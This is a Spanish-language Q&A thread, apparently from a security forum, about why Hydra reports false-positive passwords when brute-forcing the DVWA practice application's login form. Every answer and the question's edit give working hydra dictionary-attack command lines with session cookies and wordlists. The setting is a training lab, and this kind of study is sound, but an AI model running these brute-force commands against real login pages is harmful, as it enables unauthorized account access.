¿Por qué Hydra devuelve 16 contraseñas válidas cuando ninguna es válida?

Navega tus respuestas
23

He estado jugando con Hydra y DVWA y he encontrado un pequeño obstáculo: Hydra responde dejando que Sé que las primeras 16 contraseñas en mi lista de contraseñas son correctas cuando ninguna de ellas lo es.

Supongo que esto es un error de sintaxis, pero no estoy seguro de que alguien haya visto esto antes. He seguido varios tutoriales sin suerte, así que espero que alguien pueda ayudar.

Sintaxis: 

hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Salida 

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.88.196   login: admin   password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] host: 192.168.88.196   login: admin   password: adrian
[80][www-form] host: 192.168.88.196   login: admin   password: aerobics
[80][www-form] host: 192.168.88.196   login: admin   password: academic
[80][www-form] host: 192.168.88.196   login: admin   password: access
[80][www-form] host: 192.168.88.196   login: admin   password: abc
[80][www-form] host: 192.168.88.196   login: admin   password: admin
[80][www-form] host: 192.168.88.196   login: admin   password: academia
[80][www-form] host: 192.168.88.196   login: admin   password: albatross
[80][www-form] host: 192.168.88.196   login: admin   password: alex
[80][www-form] host: 192.168.88.196   login: admin   password: airplane
[80][www-form] host: 192.168.88.196   login: admin   password: albany
[80][www-form] host: 192.168.88.196   login: admin   password: ada
[80][www-form] host: 192.168.88.196   login: admin   password: aaa
[80][www-form] host: 192.168.88.196   login: admin   password: albert
[80][www-form] host: 192.168.88.196   login: admin   password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-05 22:30:51

EDIT

Tuve éxito en Brute forzando las credenciales de administrador. Una vez que me había autenticado en DVWA, necesitaba encontrar la información de las cookies (fácilmente realizada a través de su navegador o Burp Suite) Una vez que tuve la información de la cookie, emití el siguiente comando que funcionó. 

hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"
    
pregunta DKNUCKLES 06.06.2013 - 04:38
fuente

3 respuestas

23

El mismo problema me sucedió cuando estaba jugando con DVWA. La razón es que estás intentando realizar una fuerza bruta YOUR_SERVER/dvwa/vulnerabilities/brute/index.php que necesita autenticación. Intente visitar esa página en su navegador y se le pedirá que ingrese un nombre de usuario y una contraseña (una forma diferente de la que está tratando de aplicar fuerza bruta)

Entonces, mientras intentas hacer esto con fuerza bruta:

Hydraenrealidadestá"viendo" esto:

Enelsegundoformulario,noapareceráelmensaje"Nombre de usuario y / o contraseña incorrectos". , que le dijo a Hydra que usara para diferenciar entre inicios de sesión fallidos y exitosos. Hydra no ve ese mensaje de inicio de sesión fallido, por lo que se supone que el inicio de sesión fue exitoso.

Por lo tanto, debe iniciar sesión con un navegador, obtener la cookie de sesión (de manera predeterminada, PHPSESSID ), y enviarla a Hydra, y luego Hydra podrá "ver" la primera forma.

Supuestamente, puede establecer la cookie en los encabezados HTTP en Hydra haciendo H=Cookie:NAME=VALUE o apuntando a Hydra a un archivo que establece la cookie haciendo C=/path/to/file . Desafortunadamente, ninguno de estos funcionó para mí.

Después de frustrarme, terminé comentando la Línea: 5 ( dvwaPageStartup ) en el archivo /dvwa/vulnerabilities/brute/index.php , lo que permitió a Hydra ver el formulario de inicio de sesión vulnerable actual.

    
respondido por el Adi 06.06.2013 - 09:53
fuente
3

Esto es lo que funcionó para mí:

hydra 192.168.56.2 -l admin -P /home/user/Downloads/pass.txt http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=n5ggv5f2b3vcrl9fe15nqu6v95"

    
respondido por el enigma 31.07.2013 - 15:13
fuente
2

Parece que Hydra es muy implacable cuando se trata de sintaxis. Puede utilizar el formato "URL como" para especificar el módulo, el host y la ruta.

Me tomó un tiempo llegar allí, pero esto es lo que funcionó para mí ( hackme es el anfitrión): 

hydra -V -l smithy -P /usr/share/wordlists/rockyou.txt "http-get-form://hackme/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Editar abril 2015

Parece que lo han cambiado y el formato anterior ya no funciona. Sin embargo, esto es aceptado: 

hydra hackme -V -l smithy -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

El error que me enamoré pasó tanto tiempo en depurar que mi ID de sesión de PHP se había agotado. Una vez que lo actualicé, empezó a funcionar.

El otro problema fue cuando estaba haciendo la depuración con Wireshark: estaba tomando la primera solicitud HTTP y me pregunté por qué no se pasaron los parámetros de nombre de usuario y contraseña. Parece que Hydra realiza una solicitud HTTP a la URL sin parámetros primero.

    
respondido por el SilverlightFox 27.02.2015 - 15:34
fuente

Lea otras preguntas en las etiquetas

¿Maneras de firmar la clave pública de gpg para que sea confiable? ¿Opciones al defenderse contra SSLstrip?